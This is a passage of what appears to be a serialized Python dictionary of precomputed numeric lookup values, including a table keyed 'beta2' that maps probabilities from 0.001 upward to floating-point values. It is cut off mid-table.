0.4984296180594595, 0.5: 0.49999995000002634, 0.501: 0.501570281940593, 0.502: 0.503140598391728, 0.503: 0.5047108838641572, 0.504: 0.5062811228689086, 0.505: 0.5078512999174655, 0.506: 0.5094213995219258, 0.507: 0.5109914061951365, 0.508: 0.5125613044509014, 0.509: 0.5141310788040525, 0.51: 0.5157007137706554, 0.511: 0.5172701938681654, 0.512: 0.5188395036155542, 0.513: 0.5204086275334624, 0.514: 0.5219775501443703, 0.515: 0.5235462559727657, 0.516: 0.5251147295452544, 0.517: 0.5266829553907397, 0.518: 0.528250918040545, 0.519: 0.5298186020286205, 0.52: 0.5313859918916671, 0.521: 0.5329530721692634, 0.522: 0.5345198274040545, 0.523: 0.5360862421418862, 0.524: 0.537652300931973, 0.525: 0.539217988327026, 0.526: 0.5407832888834216, 0.527: 0.5423481871613691, 0.528: 0.5439126677250353, 0.529: 0.5454767151427029, 0.53: 0.5470403139869298, 0.531: 0.5486034488346969, 0.532: 0.5501661042675711, 0.533: 0.55172826487184, 0.534: 0.5532899152386647, 0.535: 0.5548510399642619, 0.536: 0.5564116236500098, 0.537: 0.5579716509026302, 0.538: 0.559531106334332, 0.539: 0.561089974562978, 0.54: 0.5626482402122126, 0.541: 0.5642058879116199, 0.542: 0.5657629022968834, 0.543: 0.5673192680099375, 0.544: 0.5688749696991147, 0.545: 0.5704299920192883, 0.546: 0.5719843196320321, 0.547: 0.5735379372057962, 0.548: 0.5750908294160064, 0.549: 0.5766429809452559, 0.55: 0.5781943764834458, 0.551: 0.5797450007279189, 0.552: 0.5812948383836369, 0.553: 0.5828438741633399, 0.554: 0.5843920927876468, 0.555: 0.5859394789852435, 0.556: 0.5874860174930375, 0.557: 0.5890316930562921, 0.558: 0.5905764904287797, 0.559: 0.5921203943729266, 0.56: 0.5936633896599984, 0.561: 0.5952054610702033, 0.562: 0.5967465933928549, 0.563: 0.598286771426558, 0.564: 0.5998259799793038, 0.565: 0.6013642038686663, 0.566: 0.6029014279219069, 0.567: 0.6044376369761812, 0.568: 0.605972815878622, 0.569: 0.6075069494865581, 0.57: 0.6090400226676023, 0.571: 0.6105720202998441, 0.572: 0.6121029272719771, 0.573: 0.6136327284834384, 
0.574: 0.6151614088445854, 0.575: 0.6166889532768235, 0.576: 0.6182153467127918, 0.577: 0.6197405740964411, 0.578: 0.621264620383258, 0.579: 0.6227874705403462, 0.58: 0.6243091095466332, 0.581: 0.6258295223929876, 0.582: 0.6273486940823675, 0.583: 0.6288666096299769, 0.584: 0.6303832540634109, 0.585: 0.6318986124227917, 0.586: 0.633412669760958, 0.587: 0.6349254111435296, 0.588: 0.6364368216491676, 0.589: 0.6379468863696165, 0.59: 0.6394555904099148, 0.591: 0.6409629188885073, 0.592: 0.6424688569374215, 0.593: 0.6439733897023986, 0.594: 0.6454765023430352, 0.595: 0.6469781800329419, 0.596: 0.6484784079598654, 0.597: 0.6499771713258791, 0.598: 0.6514744553474836, 0.599: 0.6529702452557735, 0.6: 0.6544645262966026, 0.601: 0.6559572837306726, 0.602: 0.657448502833754, 0.603: 0.6589381688967442, 0.604: 0.6604262672259017, 0.605: 0.6619127831429096, 0.606: 0.663397701985108, 0.607: 0.6648810091055518, 0.608: 0.6663626898731922, 0.609: 0.6678427296730491, 0.61: 0.6693211139063204, 0.611: 0.6707978279905191, 0.612: 0.6722728573596439, 0.613: 0.6737461874643103, 0.614: 0.6752178037718943, 0.615: 0.6766876917666598, 0.616: 0.6781558369499654, 0.617: 0.6796222248403179, 0.618: 0.6810868409735612, 0.619: 0.6825496709030271, 0.62: 0.6840107001996586, 0.621: 0.6854699144521739, 0.622: 0.6869272992671747, 0.623: 0.6883828402693223, 0.624: 0.6898365231014565, 0.625: 0.6912883334247485, 0.626: 0.6927382569188532, 0.627: 0.6941862792820104, 0.628: 0.6956323862312337, 0.629: 0.6970765635024082, 0.63: 0.6985187968504759, 0.631: 0.6999590720495417, 0.632: 0.7013973748930374, 0.633: 0.7028336911938431, 0.634: 0.7042680067844215, 0.635: 0.7057003075169808, 0.636: 0.7071305792635945, 0.637: 0.7085588079163645, 0.638: 0.7099849793875307, 0.639: 0.7114090796096405, 0.64: 0.7128310945356621, 0.641: 0.7142510101391204, 0.642: 0.7156688124142838, 0.643: 0.717084487376214, 0.644: 0.7184980210610075, 0.645: 0.7199093995258576, 0.646: 0.7213186088492126, 0.647: 0.7227256351309164, 0.648: 
0.7241304644923598, 0.649: 0.7255330830765977, 0.65: 0.7269334770484782, 0.651: 0.7283316325948096, 0.652: 0.7297275359244724, 0.653: 0.7311211732685733, 0.654: 0.7325125308805537, 0.655: 0.733901595036347, 0.656: 0.7352883520345028, 0.657: 0.7366727881963586, 0.658: 0.7380548898661029, 0.659: 0.739434643410972, 0.66: 0.7408120352213614, 0.661: 0.7421870517109705, 0.662: 0.743559679316915, 0.663: 0.7449299044998705, 0.664: 0.7462977137442283, 0.665: 0.7476630935582027, 0.666: 0.7490260304739599, 0.667: 0.7503865110477751, 0.668: 0.7517445218601482, 0.669: 0.7531000495159391, 0.67: 0.7544530806445042, 0.671: 0.7558036018998235, 0.672: 0.7571515999606306, 0.673: 0.7584970615305413, 0.674: 0.7598399733382102, 0.675: 0.761180322137431, 0.676: 0.7625180947072826, 0.677: 0.7638532778522458, 0.678: 0.7651858584023625, 0.679: 0.7665158232133165, 0.68: 0.7678431591666188, 0.681: 0.769167853169701, 0.682: 0.7704898921560582, 0.683: 0.7718092630853548, 0.684: 0.7731259529436056, 0.685: 0.7744399487432396, 0.686: 0.7757512375232757, 0.687: 0.77705980634943, 0.688: 0.7783656423142555, 0.689: 0.7796687325372516, 0.69: 0.7809690641650093, 0.691: 0.7822666243713208, 0.692: 0.7835614003573212, 0.693: 0.7848533793516024, 0.694: 0.7861425486103601, 0.695: 0.7874288954174895, 0.696: 0.7887124070847301, 0.697: 0.7899930709517766, 0.698: 0.7912708743864384, 0.699: 0.7925458047847241, 0.7: 0.7938178495709807, 0.701: 0.7950869961980253, 0.702: 0.7963532321472501, 0.703: 0.7976165449287628, 0.704: 0.7988769220815145, 0.705: 0.8001343511734024, 0.706: 0.8013888198013999, 0.707: 0.8026403155916954, 0.708: 0.8038888261997863, 0.709: 0.8051343393106174, 0.71: 0.8063768426387102, 0.711: 0.8076163239282677, 0.712: 0.8088527709533002, 0.713: 0.8100861715177531, 0.714: 0.8113165134556105, 0.715: 0.8125437846310448, 0.716: 0.8137679729384877, 0.717: 0.8149890663028079, 0.718: 0.8162070526793901, 0.719: 0.817421920054271, 0.72: 0.8186336564442488, 0.721: 0.8198422498970002, 0.722: 
0.8210476884912175, 0.723: 0.8222499603366951, 0.724: 0.8234490535744822, 0.725: 0.82464495637696, 0.726: 0.8258376569479937, 0.727: 0.8270271435230239, 0.728: 0.8282134043692099, 0.729: 0.8293964277855104, 0.73: 0.8305762021028226, 0.731: 0.8317527156841129, 0.732: 0.8329259569244847, 0.733: 0.8340959142513266, 0.734: 0.8352625761244205, 0.735: 0.8364259310360529, 0.736: 0.8375859675111375, 0.737: 0.8387426741073075, 0.738: 0.8398960394150405, 0.739: 0.8410460520577919, 0.74: 0.8421927006920776, 0.741: 0.8433359740075778, 0.742: 0.8444758607272893, 0.743: 0.8456123496075938, 0.744: 0.8467454294384124, 0.745: 0.8478750890432711, 0.746: 0.8490013172794411, 0.747: 0.8501241030380398, 0.748: 0.8512434352441408, 0.749: 0.8523593028568818, 0.75: 0.8534716948695734, 0.751: 0.8545806003098092, 0.752: 0.8556860082395743, 0.753: 0.8567879077553627, 0.754: 0.8578862879882565, 0.755: 0.8589811381040585, 0.756: 0.8600724473033952, 0.757: 0.8611602048218131, 0.758: 0.8622443999298985, 0.759: 0.8633250219333687, 0.76: 0.8644020601732016, 0.761: 0.8654755040257103, 0.762: 0.8665453429026564, 0.763: 0.8676115662513868, 0.764: 0.8686741635548794, 0.765: 0.8697331243319023, 0.766: 0.8707884381370734, 0.767: 0.8718400945610152, 0.768: 0.8728880832303882, 0.769: 0.8739323938080559, 0.77: 0.8749730159931451, 0.771: 0.8760099395211802, 0.772: 0.8770431541641623, 0.773: 0.8780726497306806, 0.774: 0.8790984160659892, 0.775: 0.8801204430521462, 0.776: 0.8811387206080885, 0.777: 0.8821532386897348, 0.778: 0.8831639872900949, 0.779: 0.8841709564393376, 0.78: 0.8851741362049375, 0.781: 0.8861735166917408, 0.782: 0.8871690880420503, 0.783: 0.8881608404357615, 0.784: 0.8891487640904325, 0.785: 0.8901328492613948, 0.786: 0.8911130862418335, 0.787: 0.8920894653628848, 0.788: 0.8930619769937581, 0.789: 0.8940306115417905, 0.79: 0.8949953594525705, 0.791: 0.8959562112100302, 0.792: 0.8969131573365103, 0.793: 0.8978661883929069, 0.794: 0.8988152949787099, 0.795: 0.8997604677321327, 0.796: 
0.9007016973301941, 0.797: 0.9016389744887798, 0.798: 0.902572289962797, 0.799: 0.9035016345462047, 0.8: 0.904426999072146, 0.801: 0.9053483744130083, 0.802: 0.9062657514805408, 0.803: 0.9071791212259233, 0.804: 0.9080884746398658, 0.805: 0.9089938027526939, 0.806: 0.9098950966344315, 0.807: 0.910792347394901, 0.808: 0.9116855461838177, 0.809: 0.9125746841908512, 0.81: 0.9134597526457117, 0.811: 0.9143407428182829, 0.812: 0.9152176460186581, 0.813: 0.9160904535972341, 0.814: 0.9169591569448252, 0.815: 0.9178237474927222, 0.816: 0.9186842167127738, 0.817: 0.9195405561174878, 0.818: 0.9203927572601225, 0.819: 0.9212408117347362, 0.82: 0.9220847111762885, 0.821: 0.9229244472607281, 0.822: 0.9237600117050847, 0.823: 0.9245913962675107, 0.824: 0.9254185927473991, 0.825: 0.9262415929854614, 0.826: 0.9270603888637834, 0.827: 0.9278749723059329, 0.828: 0.9286853352770361, 0.829: 0.9294914697838355, 0.83: 0.9302933678747891, 0.831: 0.9310910216401402, 0.832: 0.9318844232119854, 0.833: 0.9326735647643802, 0.834: 0.9334584385133998, 0.835: 0.9342390367172065, 0.836: 0.9350153516761455, 0.837: 0.9357873757328031, 0.838: 0.9365551012720951, 0.839: 0.9373185207213172, 0.84: 0.9380776265502867, 0.841: 0.9388324112713275, 0.842: 0.9395828674393858, 0.843: 0.9403289876521342, 0.844: 0.9410707645499891, 0.845: 0.9418081908162181, 0.846: 0.9425412591769937, 0.847: 0.9432699624014971, 0.848: 0.9439942933019441, 0.849: 0.9447142447336556, 0.85: 0.9454298095952256, 0.851: 0.9461409808284335, 0.852: 0.9468477514184452, 0.853: 0.9475501143938321, 0.854: 0.9482480628266101, 0.855: 0.9489415898323792, 0.856: 0.9496306885703165, 0.857: 0.9503153522432926, 0.858: 0.9509955740979518, 0.859: 0.9516713474246952, 0.86: 0.9523426655578546, 0.861: 0.9530095218756819, 0.862: 0.9536719098004376, 0.863: 0.9543298227984653, 0.864: 0.9549832543802415, 0.865: 0.9556321981004747, 0.866: 0.9562766475580771, 0.867: 0.9569165963963785, 0.868: 0.957552038303007, 0.869: 0.9581829670101363, 0.87: 
0.9588093762944023, 0.871: 0.9594312599770245, 0.872: 0.9600486119238871, 0.873: 0.9606614260455268, 0.874: 0.9612696962973124, 0.875: 0.9618734166793589, 0.876: 0.9624725812367078, 0.877: 0.9630671840593212, 0.878: 0.963657219282159, 0.879: 0.9642426810852343, 0.88: 0.9648235636936664, 0.881: 0.9653998613777618, 0.882: 0.9659715684530346, 0.883: 0.9665386792802856, 0.884: 0.9671011882656463, 0.885: 0.9676590898606391, 0.886: 0.9682123785622323, 0.887: 0.9687610489129148, 0.888: 0.9693050955007348, 0.889: 0.9698445129592854, 0.89: 0.9703792959678934, 0.891: 0.9709094392515344, 0.892: 0.9714349375810314, 0.893: 0.9719557857729668, 0.894: 0.9724719786897739, 0.895: 0.9729835112398603, 0.896: 0.9734903783775493, 0.897: 0.9739925751032259, 0.898: 0.9744900964633376, 0.899: 0.9749829375503833, 0.9: 0.9754710935031543, 0.901: 0.975954559506505, 0.902: 0.9764333307916824, 0.903: 0.9769074026361838, 0.904: 0.977376770363807, 0.905: 0.9778414293448636, 0.906: 0.9783013749960354, 0.907: 0.9787566027805276, 0.908: 0.9792071082080259, 0.909: 0.979652886834865, 0.91: 0.9800939342639616, 0.911: 0.9805302461449361, 0.912: 0.9809618181741064, 0.913: 0.9813886460944932, 0.914: 0.9818107256959976, 0.915: 0.9822280528152776, 0.916: 0.9826406233359377, 0.917: 0.9830484331884335, 0.918: 0.9834514783502447, 0.919: 0.983849754845784, 0.92: 0.9842432587465588, 0.921: 0.9846319861711421, 0.922: 0.9850159332851474, 0.923: 0.9853950963014838, 0.924: 0.9857694714800598, 0.925: 0.9861390551281946, 0.926: 0.9865038436003799, 0.927: 0.9868638332984115, 0.928: 0.9872190206714289, 0.929: 0.9875694022159492, 0.93: 0.9879149744757998, 0.931: 0.9882557340424174, 0.932: 0.9885916775546096, 0.933: 0.9889228016987052, 0.934: 0.9892491032085032, 0.935: 0.9895705788654393, 0.936: 0.9898872254986016, 0.937: 0.9901990399846192, 0.938: 0.9905060192478585, 0.939: 0.9908081602602608, 0.94: 0.9911054600416364, 0.941: 0.9913979156594912, 0.942: 0.9916855242290242, 0.943: 0.9919682829133988, 0.944: 
0.9922461889235121, 0.945: 0.9925192395181012, 0.946: 0.9927874320039602, 0.947: 0.9930507637356284, 0.948: 0.9933092321156767, 0.949: 0.9935628345946121, 0.95: 0.9938115686709654, 0.951: 0.9940554318912629, 0.952: 0.9942944218501137, 0.953: 0.9945285361901042, 0.954: 0.9947577726020647, 0.955: 0.994982128824796, 0.956: 0.9952016026454088, 0.957: 0.9954161918988457, 0.958: 0.9956258944685976, 0.959: 0.9958307082861366, 0.96: 0.9960306313311733, 0.961: 0.9962256616318514, 0.962: 0.9964157972645225, 0.963: 0.9966010363532803, 0.964: 0.9967813770714362, 0.965: 0.9969568176399499, 0.966: 0.9971273563282133, 0.967: 0.9972929914544159, 0.968: 0.9974537213842967, 0.969: 0.997609544532683, 0.97: 0.99776045936265, 0.971: 0.9979064643855302, 0.972: 0.998047558161119, 0.973: 0.9981837392977511, 0.974: 0.9983150064523987, 0.975: 0.998441358329476, 0.976: 0.9985627936837991, 0.977: 0.9986793113165953, 0.978: 0.9987909100790213, 0.979: 0.9988975888701616, 0.98: 0.9989993466374386, 0.981: 0.9990961823781122, 0.982: 0.9991880951364369, 0.983: 0.9992750840051866, 0.984: 0.9993571481267158, 0.985: 0.9994342866927166, 0.986: 0.9995064989413405, 0.987: 0.9995737841591226, 0.988: 0.9996361416834054, 0.989: 0.999693570900148, 0.99: 0.9997460712416946, 0.991: 0.9997936421899241, 0.992: 0.9998362832780031, 0.993: 0.9998739940837995, 0.994: 0.9999067742301825, 0.995: 0.9999346234013291, 0.996: 0.9999575413149437, 0.997: 0.9999755277529793, 0.998: 0.9999885825363027, 0.999: 0.9999967055724355}, 'beta2': {0.001: 0.18138618309331878, 0.002: 0.2095288006990791, 0.003: 0.22808938583740646, 0.004: 0.24231103099879125, 0.005: 0.25399266824367905, 0.006: 0.2639853316123639, 0.007: 0.27276438337239206, 0.008: 0.2806244307628958, 0.009: 0.2877616440177957, 0.01: 0.2943137216819569, 0.011: 0.3003813120390968, 0.012: 0.3060403810987299, 0.013: 0.3113497805549208, 0.014: 0.3163561002121821, 0.015: 0.3210969013101458, 0.016: 0.325602941614643, 0.017: 0.329899749275389, 0.018: 0.33400876269337276, 0.019: 
0.33794817324913373, 0.02: 0.3417335597331963, 0.021: 0.3453783736859486, 0.022: 0.3488943160363729, 0.023: 0.3522916331669663, 0.024: 0.3555793523572848, 0.025: 0.3587654710031575, 0.026: 0.3618571101532857, 0.027: 0.36486064019226205, 0.028: 0.36778178455819777, 0.029: 0.37062570597348865, 0.03: 0.37339707863290983, 0.031: 0.37610014902380184, 0.032: 0.3787387874740419, 0.033: 0.3813165320847782, 0.034: 0.3838366263675599, 0.035: 0.38630205164508613, 0.036: 0.3887155550719671, 0.037: 0.3910796739716751, 0.038: 0.3933967570598198, 0.039: 0.39566898302294606, 0.04: 0.3978983768411247, 0.041: 0.400086824177587, 0.042: 0.40223608410583866, 0.043: 0.4043478004003044, 0.044: 0.4064235115828295, 0.045: 0.40846465988692804, 0.046: 0.41047259927722757, 0.047: 0.4124486026424321, 0.048: 0.41439386826257285, 0.049: 0.4163095256370182, 0.05: 0.41819664074840723, 0.051: 0.42005622082694316, 0.052: 0.4218892186715135, 0.053: 0.4236965365765072, 0.054: 0.4254790299068756, 0.055: 0.42723751035902224, 0.056: 0.42897274894021686, 0.057: 0.4306854786954264, 0.058: 0.4323763972069631, 0.059: 0.4340461688895506, 0.06: 0.43569542710067843, 0.061: 0.4373247760837633, 0.062: 0.43893479276010283, 0.063: 0.4405260283836726, 0.064: 0.44209901007086383, 0.065: 0.443654242216893, 0.066: 0.44671336964273567, 0.067: 0.44671336964273567, 0.068: 0.4497070389866893, 0.069: 0.4497070389866893, 0.07: 0.45263858990657657, 0.071: 0.45263858990657657, 0.072: 0.4540820432314365, 0.073: 0.45551110378697934, 0.074: 0.4569261207298041, 0.075: 0.4583274301949174, 0.076: 0.45971535594807744, 0.077: 0.46109020999750316, 0.078: 0.4624522931676177, 0.079: 0.4638018956379941, 0.08: 0.46513929744980287, 0.081: 0.4664647689820931, 0.082: 0.4677785714002497, 0.083: 0.46908095707825426, 0.084: 0.47037216999690146, 0.085: 0.4716524461194248, 0.086: 0.47292201374610887, 0.087: 0.4741810938492603, 0.088: 0.47542990038988897, 0.089: 0.4766686406172559, 0.09: 0.4778975153524657, 0.091: 0.47911671925695065, 0.092: 
0.48032644108707956, 0.093: 0.4815268639354624, 0.094: 0.4827181654599544, 0.095: 0.4839005181010876, 0.096: 0.48507408928867246, 0.097: 0.4862390416379627, 0.098: 0.4873955331364289, 0.099: 0.48854371732133284, 0.1: 0.4896837434487873, 0.101: 0.49081575665475574, 0.102: 0.49193989810855143, 0.103: 0.4930563051590159, 0.104: 0.49416511147415587, 0.105: 0.495266447174198, 0.106: 0.49636043895869586, 0.107: 0.49744721022798233, 0.108: 0.49852688119905497, 0.109: 0.4995995690166022, 0.11: 0.5006653878589256, 0.111: 0.5017244490394137, 0.112: 0.5027768611037023, 0.113: 0.5038227299225796, 0.114: 0.5048621587811261, 0.115: 0.5058952484639588, 0.116: 0.5069220973371278, 0.117: 0.5079428014264691, 0.118: 0.5089574544929876, 0.119: 0.5099661481050076, 0.12: 0.5109689717074745, 0.121: 0.5119660126886201, 0.122: 0.5129573564438621, 0.123: 0.5139430864373226, 0.124: 0.5149232842608563, 0.125: 0.5158980296909226, 0.126: 0.5168674007432517, 0.127: 0.5178314737253517, 0.128: 0.5187903232872535, 0.129: 0.5197440224701283, 0.13: 0.520692642753303, 0.131: 0.5216362540994293, 0.132: 0.5225749249981224, 0.133: 0.5235087225078974, 0.134: 0.5244377122967149, 0.135: 0.52536195868101, 0.136: 0.5262815246634096, 0.137: 0.5271964719690554, 0.138: 0.5281068610807536, 0.139: 0.5290127512728111, 0.14: 0.5299142006438173, 0.141: 0.5308112661481983, 0.142: 0.5317040036268519, 0.143: 0.5325924678365663, 0.144: 0.5334767124786391, 0.145: 0.5343567902264184, 0.146: 0.5352327527520485, 0.147: 0.5361046507522651, 0.148: 0.5369725339733495, 0.149: 0.5378364512353526, 0.15: 0.5386964504554625, 0.151: 0.5395525786707096, 0.152: 0.540404882059873, 0.153: 0.5412534059647808, 0.154: 0.542098194910871, 0.155: 0.5429392926271754, 0.156: 0.5437767420656946, 0.157: 0.5446105854201171, 0.158: 0.5454408641439848, 0.159: 0.5462676189684185, 0.16: 0.5470908899191484, 0.161: 0.5479107163331672, 0.162: 0.5487271368748141, 0.163: 0.5495401895514537, 0.164: 0.5503499117285972, 0.165: 0.551156340144686, 0.166: 
0.5519595109254223, 0.167: 0.5527594595976102, 0.168: 0.5535562211027355, 0.169: 0.5543498298100424, 0.17: 0.5551403195293081, 0.171: 0.5559277235232404, 0.172: 0.5567120745195285, 0.173: 0.5574934047225648, 0.174: 0.5582717458248277, 0.175: 0.559047129017996, 0.176: 0.5598195850037039, 0.177: 0.5605891440040408, 0.178: 0.5613558357717686, 0.179: 0.5621196896002469, 0.18: 0.5628807343331038, 0.181: 0.5636389983736705, 0.182: 0.5643945096941182, 0.183: 0.5651472958444157, 0.184: 0.565897383961005, 0.185: 0.5666448007752878, 0.186: 0.5673895726218545, 0.187: 0.5681317254465624, 0.188: 0.5688712848143356, 0.189: 0.5696082759168204, 0.19: 0.570342723579832, 0.191: 0.5718040861049116, 0.192: 0.5718040861049116, 0.193: 0.5732555639507467, 0.194: 0.5732555639507467, 0.195: 0.5746973432714193, 0.196: 0.5746973432714193, 0.197: 0.5761296050215254, 0.198: 0.5761296050215254, 0.199: 0.5775525251538719, 0.2: 0.5775525251538719, 0.201: 0.5789662748077831, 0.202: 0.5789662748077831, 0.203: 0.580371020488508, 0.204: 0.580371020488508, 0.205: 0.5810700676469496, 0.206: 0.5817669242382939, 0.207: 0.5824616098472468, 0.208: 0.5831541437995564, 0.209: 0.5838445451667302, 0.21: 0.5845328327706043, 0.211: 0.5852190251878382, 0.212: 0.585903140754301, 0.213: 0.5865851975693661, 0.214: 0.5872652135000757, 0.215: 0.5879432061852801, 0.216: 0.5886191930396023, 0.217: 0.5892931912573885, 0.218: 0.5899652178165296, 0.219: 0.5906352894822113, 0.22: 0.5913034228105724, 0.221: 0.5919696341523156, 0.222: 0.5926339396561907, 0.223: 0.5932963552724543, 0.224: 0.5939568967562234, 0.225: 0.5946155796707533, 0.226: 0.5952724193906889, 0.227: 0.5959274311051924, 0.228: 0.596580629821043, 0.229: 0.5972320303656522, 0.23: 0.5978816473900281, 0.231: 0.5985294953716854, 0.232: 0.5991755886174532, 0.233: 0.5998199412662939, 0.234: 0.6004625672920095, 0.235: 0.601103480505905, 0.236: 0.6017426945594111, 0.237: 0.6023802229466413, 0.238: 0.6030160790069156, 0.239: 0.6036502759272008, 0.24: 
0.6042828267445396, 0.241: 0.6049137443484032, 0.242: 0.6055430414830111, 0.243: 0.6061707307496114, 0.244: 0.6067968246086884, 0.245: 0.6074213353821661, 0.246: 0.6080442752555413, 0.247: 0.6086656562799749, 0.248: 0.6092854903743761, 0.249: 0.609903789327387, 0.25: 0.6105205647993905, 0.251: 0.6111358283244531, 0.252: 0.6117495913122184, 0.253: 0.6123618650497772, 0.254: 0.6129726607035273, 0.255: 0.6135819893209489, 0.256: 0.6141898618323709, 0.257: 0.6147962890527381, 0.258: 0.6154012816832698, 0.259: 0.6160048503131699, 0.26: 0.6166070054212498, 0.261: 0.6172077573775245, 0.262: 0.6178071164448349, 0.263: 0.6184050927803595, 0.264: 0.6190016964371575, 0.265: 0.6195969373656643, 0.266: 0.6201908254151702, 0.267: 0.6207833703352457, 0.268: 0.6213745817771764, 0.269: 0.6219644692953454, 0.27: 0.6225530423486144, 0.271: 0.6231403103016593, 0.272: 0.6237262824262815, 0.273: 0.624310967902731, 0.274: 0.624894375820968, 0.275: 0.6254765151819087, 0.276: 0.6260573948986715, 0.277: 0.6266370237977733, 0.278: 0.627215410620342, 0.279: 0.6277925640232481, 0.28: 0.6283684925803023, 0.281: 0.628943204783341, 0.282: 0.629516709043367, 0.283: 0.6300890136916307, 0.284: 0.6306601269807006, 0.285: 0.6312300570855304, 0.286: 0.6317988121044862, 0.287: 0.6323664000603757, 0.288: 0.6329328289014384, 0.289: 0.633498106502367, 0.29: 0.6340622406652381, 0.291: 0.6346252391204967, 0.292: 0.6351871095278874, 0.293: 0.6357478594773636, 0.294: 0.6363074964900378, 0.295: 0.6368660280190218, 0.296: 0.6374234614503631, 0.297: 0.6379798041038829, 0.298: 0.6385350632340105, 0.299: 0.6390892460306717, 0.3: 0.6396423596200767, 0.301: 0.6401944110655492, 0.302: 0.6407454073683171, 0.303: 0.6412953554683015, 0.304: 0.6418442622449138, 0.305: 0.6423921345177895, 0.306: 0.6429389790475577, 0.307: 0.6434848025365723, 0.308: 0.644029611629644, 0.309: 0.6445734129147622, 0.31: 0.6451162129237973, 0.311: 0.6456580181331952, 0.312: 0.6461988349646632, 0.313: 0.6467386697858525, 0.314: 
0.6472775289110052, 0.315: 0.6478154186016275, 0.316: 0.6488883144654416, 0.317: 0.6488883144654416, 0.318: 0.6499574064387202, 0.319: 0.6499574064387202, 0.32: 0.6510227427792847, 0.321: 0.6510227427792847, 0.322: 0.6520843709606412, 0.323: 0.6520843709606412, 0.324: 0.6531423376907116, 0.325: 0.6531423376907116, 0.326: 0.6541966889300284, 0.327: 0.6541966889300284, 0.328: 0.655247469909402, 0.329: 0.655247469909402, 0.33: 0.6562947251470874, 0.331: 0.6562947251470874, 0.332: 0.6573384984654542, 0.333: 0.6573384984654542, 0.334: 0.6583788330071836, 0.335: 0.6583788330071836, 0.336: 0.6594157712510555, 0.337: 0.6594157712510555, 0.338: 0.6604493550272211, 0.339: 0.6604493550272211, 0.34: 0.6614796255321204, 0.341: 0.6614796255321204, 0.342: 0.6625066233429459, 0.343: 0.6625066233429459, 0.344: 0.663018907502609, 0.345: 0.6635303884317454, 0.346: 0.6640410710345586, 0.347: 0.6645509601791186, 0.348: 0.6650600606977741, 0.349: 0.6655683773875551, 0.35: 0.6660759150105728, 0.351: 0.6665826782944113, 0.352: 0.6670886719325101, 0.353: 0.6675939005845511, 0.354: 0.6680983688768286, 0.355: 0.6686020814026354, 0.356: 0.6691050427226102, 0.357: 0.6696072573651206, 0.358: 0.6701087298265976, 0.359: 0.6706094645719106, 0.36: 0.6711094660346952, 0.361: 0.6716087386177194, 0.362: 0.6721072866932013, 0.363: 0.672605114603156, 0.364: 0.6731022266597249, 0.365: 0.673598627145503, 0.366: 0.6740943203138587, 0.367: 0.6745893103892513, 0.368: 0.6750836015675439, 0.369: 0.675577198016321, 0.37: 0.6760701038751914, 0.371: 0.6765623232560871, 0.372: 0.6770538602435703, 0.373: 0.6775447188951182, 0.374: 0.6780349032414232, 0.375: 0.6785244172866713, 0.376: 0.6790132650088415, 0.377: 0.6795014503599768, 0.378: 0.6799889772664565, 0.379: 0.6804758496292819, 0.38: 0.6809620713243425, 0.381: 0.6814476462026801, 0.382: 0.681932578090763, 0.383: 0.6824168707907288, 0.384: 0.6829005280806688, 0.385: 0.6833835537148568, 0.386: 0.6838659514240226, 0.387: 0.6843477249155834, 0.388: 
0.6848288778739036, 0.389: 0.6853094139605289, 0.39: 0.6857893368144322, 0.391: 0.6862686500522506, 0.392: 0.686747357268519, 0.393: 0.6872254620359026, 0.394: 0.687702967905425, 0.395: 0.688179878406694, 0.396: 0.688656197048134, 0.397: 0.6891319273171946, 0.398: 0.6896070726805891, 0.399: 0.6900816365844882, 0.4: 0.6905556224547547, 0.401: 0.6910290336971351, 0.402: 0.6915018736974954, 0.403: 0.6919741458219966, 0.404: 0.6924458534173312, 0.405: 0.692916999810907, 0.406: 0.6933875883110421, 0.407: 0.693857622207189, 0.408: 0.6943271047701068, 0.409: 0.6947960392520569, 0.41: 0.6952644288870155, 0.411: 0.6957322768908354, 0.412: 0.6961995864614565, 0.413: 0.6966663607790745, 0.414: 0.6971326030063474, 0.415: 0.6975983162885411, 0.416: 0.6980635037537497, 0.417: 0.6985281685130438, 0.418: 0.6989923136606674, 0.419: 0.6994559422741938, 0.42: 0.699919057414716, 0.421: 0.7003816621269993, 0.422: 0.700843759439666, 0.423: 0.7013053523653541, 0.424: 0.7017664439008835, 0.425: 0.702227037027428, 0.426: 0.7026871347106631, 0.427: 0.7031467399009421, 0.428: 0.7036058555334419, 0.429: 0.7040644845283315, 0.43: 0.7045226297909155, 0.431: 0.70498029421181, 0.432: 0.7054374806670598, 0.433: 0.7058941920183321, 0.434: 0.7063504311130315, 0.435: 0.7068062007844735, 0.436: 0.7072615038520105, 0.437: 0.7077163431211877, 0.438: 0.7081707213838986, 0.439: 0.7086246414185028, 0.44: 0.7090781059899909, 0.441: 0.7099836797374939, 0.442: 0.7099836797374939, 0.443: 0.7108874644840137, 0.444: 0.7108874644840137, 0.445: 0.7117894818819261, 0.446: 0.7117894818819261, 0.447: 0.7126897533826833, 0.448: 0.7126897533826833, 0.449: 0.713588300241041, 0.45: 0.713588300241041, 0.451: 0.7144851435191959, 0.452: 0.7144851435191959, 0.453: 0.7153803040908813, 0.454: 0.7153803040908813, 0.455: 0.7162738026453555, 0.456: 0.7162738026453555, 0.457: 0.7171656596913379, 0.458: 0.7171656596913379, 0.459: 0.7180558955609, 0.46: 0.7180558955609, 0.461: 0.7189445304132334, 0.462: 0.7189445304132334, 0.463: 
0.7198315842384235, 0.464: 0.7198315842384235, 0.465: 0.7207170768611065, 0.466: 0.7207170768611065, 0.467: 0.7216010279440989, 0.468: 0.7216010279440989, 0.469: 0.7220424315094723, 0.47: 0.7224834569919608, 0.471: 0.7229241068054837, 0.472: 0.7233643833544984, 0.473: 0.7238042890341194, 0.474: 0.7242438262302121, 0.475: 0.7246829973195117, 0.476: 0.7251218046697115, 0.477: 0.7255602506395729, 0.478: 0.7259983375790399, 0.479: 0.7264360678293225, 0.48: 0.7268734437230076, 0.481: 0.727310467584157, 0.482: 0.7277471417284112, 0.483: 0.7281834684630808, 0.484: 0.7286194500872518, 0.485: 0.7290550888918857, 0.486: 0.7294903871599046, 0.487: 0.729925347166297, 0.488: 0.7303599711782167, 0.489: 0.7307942614550686, 0.49: 0.7312282202486056, 0.491: 0.731661849803029, 0.492: 0.7320951523550754, 0.493: 0.7325281301341102, 0.494: 0.7329607853622234, 0.495: 0.7333931202543144, 0.496: 0.7338251370181907, 0.497: 0.7342568378546537, 0.498: 0.7346882249575918, 0.499: 0.7351193005140648, 0.5: 0.7355500667043946, 0.501: 0.7359805257022629, 0.502: 0.736410679674782, 0.503: 0.7368405307825945, 0.504: 